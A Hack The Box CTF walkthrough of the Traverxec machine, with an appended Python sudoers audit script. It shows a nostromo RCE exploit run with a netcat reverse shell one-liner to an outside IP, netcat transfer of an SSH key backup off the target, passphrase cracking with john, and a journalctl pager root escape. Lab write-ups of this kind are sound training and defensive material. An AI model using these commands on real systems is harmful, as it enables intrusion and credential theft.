
Hackthebox Traverxec Walkthrough

In this article you will learn the following:

  • Scanning targets using nmap.
  • Enumeration
  • Exploit nostromo 1.9.6
  • Check nostromo configuration file
  • Decrypt ssh private key with john
  • Abuse sudo command for root

Port Scanning

$ nmap -Pn -sC -sV -v 10.10.10.165 -oN traverxec.nmap
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC

Add the vhost to the hosts file:

10.10.10.165 traverxec.htb

I started by enumerating the web server with gobuster:

$ gobuster dir -u http://traverxec.htb/ -w /usr/share/wordlists/dirb/common.txt    
    /css (Status: 301)
    /icons (Status: 301)
    /img (Status: 301)
    /index.html (Status: 200)
    /js (Status: 301)
    /lib (Status: 301)

The enumeration turned up nothing interesting, so I decided to search for exploits for nostromo 1.9.6, and I found one:

https://www.rapid7.com/db/modules/exploit/multi/http/nostromo_code_exec

And on Exploit-DB:

https://www.exploit-db.com/exploits/47837

nostromo 1.9.6 – Remote Code Execution

CVE : CVE-2019-1627


I downloaded the exploit and ran it.

Then I ran the exploit again with a reverse shell:

python 47837.py 10.10.10.165 80 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.5 9090 >/tmp/f"

The nostromo app is in /var/nostromo and its config is in /var/nostromo/conf, so I read nhttpd.conf.

There are 3 main things to look at in it:

	serveradmin		[email protected]
	homedirs		/home
	homedirs_public		public_www

After some digging, it seems there's a public folder in /home/david named public_www, so I tried to run ls on that path:

$ ls -al /home/david/public_www

And I got a result: there's a protected-file-area directory.

In it there's a compressed SSH backup file:
backup-ssh-identity-files.tgz

So I moved it to my machine with netcat:

nc -lvp 9091 > backup-ssh-identity-files.tgz

nc 10.10.14.5 9091 < /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz

To decompress it:

$ gunzip -d backup-ssh-identity-files.tgz
$ tar xvf backup-ssh-identity-files.tar

After checking the SSH private key, I saw that it's encrypted.

So to decrypt it and get the passphrase we need to run:

$ ssh2john id_rsa > david-ssh.key
$ john --wordlist=/root/Desktop/HTB/rockyou.txt david-ssh.key

I got the passphrase, then connected over SSH as user david and got the user flag:

$ ssh -i id_rsa [email protected]

After a little more enumeration, I found a /bin directory in david's home containing server-stats.sh, so I read it.

It seems david can run a command with sudo:

/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

To check it, I ran the script: if it asks for a password, then it's not a valid sudo command.

It ran normally, so I searched for journalctl and found there's a sudo privilege escalation:

https://gtfobins.github.io/gtfobins/journalctl/

After a few tries I found the solution:

 -n --lines[=INTEGER]       Number of journal entries to show

If we make the terminal smaller than the length of the longest line, the output opens in the pager (the restricted environment), and we can escape from it and get root privileges.

This invokes the default pager, which is likely to be less, other functions may apply. It can be used to break out from restricted environments by spawning an interactive system shell

GTFOBins

So I tried it, and it worked: I got root privileges.

normal run
make terminal smaller
Got root

Got root flag
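
The root step works because david's sudo rule lets journalctl start its pager as root. As an added example (not part of the original writeup), this Python check flags sudoers rules that allow that; the sudoers lines, the `PAGER_BINARIES` list and `audit_sudoers` are constructed assumptions, since the page does not show the host's actual sudoers file.

```python
import re

# Assumption: illustrative, not exhaustive, list of binaries that page their
# output through less by default and accept --no-pager.
PAGER_BINARIES = {"/usr/bin/journalctl", "/usr/bin/systemctl"}
SKIP = ("#", "Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias")
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+[^\s=]+\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")
TAGGED_RE = re.compile(r"^((?:[A-Z_]+\s*:\s*)*)(.*)$")

# Constructed sample rules, not taken from the target host.
SAMPLE = """\
Defaults env_reset
david ALL=(root) NOPASSWD: /usr/bin/journalctl -n5 -unostromo.service
ops   ALL=(root) NOPASSWD: /usr/bin/journalctl --no-pager -n5 -unostromo.service
audit ALL=(root) NOEXEC: /usr/bin/journalctl -n5, /usr/bin/systemctl status nostromo
web   ALL=(www-data) /usr/bin/systemctl status nostromo
"""


def audit_sudoers(text):
    """Return (user, command) pairs that can reach an interactive pager as root."""
    findings = []
    for line in map(str.strip, text.splitlines()):
        if not line or line.startswith(SKIP):  # aliases are not expanded here
            continue
        rule = RULE_RE.match(line)
        if rule is None:
            continue
        # No Runas spec means root; rules for other target users are skipped.
        runas = rule["runas"]
        targets = {"root"} if runas is None else {
            u.strip() for u in runas.split(":")[0].split(",")}
        if not targets & {"root", "ALL"}:
            continue
        noexec = False
        # Simplification: command lists are split on bare commas (no "\," escapes).
        for spec in rule["cmds"].split(","):
            tags, cmd = TAGGED_RE.match(spec.strip()).groups()
            # A tag applies to the rest of the list until its opposite appears.
            for tag in re.findall(r"[A-Z_]+", tags):
                noexec = {"NOEXEC": True, "EXEC": False}.get(tag, noexec)
            argv = cmd.split()
            if not argv or argv[0] not in PAGER_BINARIES:
                continue
            # Arguments fixed in a sudoers rule must match exactly, so a rule
            # that pins --no-pager cannot be run with the pager enabled.
            if "--no-pager" not in argv[1:] and not noexec:
                findings.append((rule["user"], cmd))
    return findings
```

Only the first sample rule is reported: the others either pin `--no-pager`, carry the sudoers `NOEXEC` tag, or do not run as root.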

That's all folks, hope you enjoyed this writeup.
